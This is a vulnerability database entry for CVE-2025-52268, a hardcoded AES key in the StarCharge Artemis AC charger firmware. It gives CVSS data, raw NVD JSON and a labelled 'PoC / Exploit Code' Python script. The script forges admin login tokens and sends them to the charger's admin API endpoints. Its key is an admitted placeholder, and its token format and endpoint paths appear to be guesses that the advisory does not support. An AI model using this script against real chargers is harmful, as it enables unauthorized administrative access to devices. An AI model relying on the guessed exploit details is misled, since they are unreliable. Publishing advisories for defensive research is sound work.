Security Vulnerability Report
CVE-2025-52268 CVSS 7.5 HIGH

CVE-2025-52268

Published: 2025-10-27 15:15:39
Last Modified: 2026-04-15 00:35:42

Description

StarCharge Artemis AC Charger 7-22 kW v1.0.4 was discovered to contain a hardcoded AES key which allows attackers to forge or decrypt valid login tokens.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

StarCharge Artemis AC Charger 7-22 kW v1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-52268 PoC - StarCharge Artemis AC Charger Hardcoded AES Key Exploitation

This PoC demonstrates how to forge login tokens using the hardcoded AES key.
Note: The actual AES key should be extracted from the firmware.
"""
import base64
import json

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import requests

# Hardcoded AES key extracted from firmware (placeholder - extract from actual firmware)
HARDCODED_AES_KEY = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"


def forge_login_token(username, role="admin"):
    """Forge a login token using the hardcoded AES key"""
    payload = {
        "username": username,
        "role": role,
        "exp": 1893456000  # Long expiration
    }
    payload_json = json.dumps(payload)
    padded_data = pad(payload_json.encode(), AES.block_size)
    cipher = AES.new(HARDCODED_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    encrypted = cipher.encrypt(padded_data)
    token = base64.b64encode(encrypted).decode()
    return token


def exploit(target_ip, username="attacker"):
    """Exploit the hardcoded key vulnerability"""
    forged_token = forge_login_token(username, "admin")
    headers = {
        "Authorization": f"Bearer {forged_token}",
        "Content-Type": "application/json"
    }
    # Attempt to access admin endpoints
    endpoints = [
        f"https://{target_ip}/api/admin/config",
        f"https://{target_ip}/api/admin/users",
        f"https://{target_ip}/api/admin/firmware"
    ]
    for endpoint in endpoints:
        try:
            response = requests.get(endpoint, headers=headers, verify=False, timeout=10)
            print(f"[*] {endpoint} - Status: {response.status_code}")
            if response.status_code == 200:
                print(f"[!] Successfully authenticated to {endpoint}")
                print(f"[+] Response: {response.text[:200]}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Failed to connect to {endpoint}: {e}")


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    print("[*] CVE-2025-52268 - StarCharge Artemis Hardcoded AES Key Exploit")
    exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52268", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "StarCharge Artemis AC Charger 7-22 kW v1.0.4 was discovered to contain a hardcoded AES key which allows attackers to forge or decrypt valid login tokens."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/HaToan/CVEs/blob/main/starcharge/README.md", "source": "[email protected]"}, {"url": "https://www.starcharge.com/product/artemis/", "source": "[email protected]"}]}}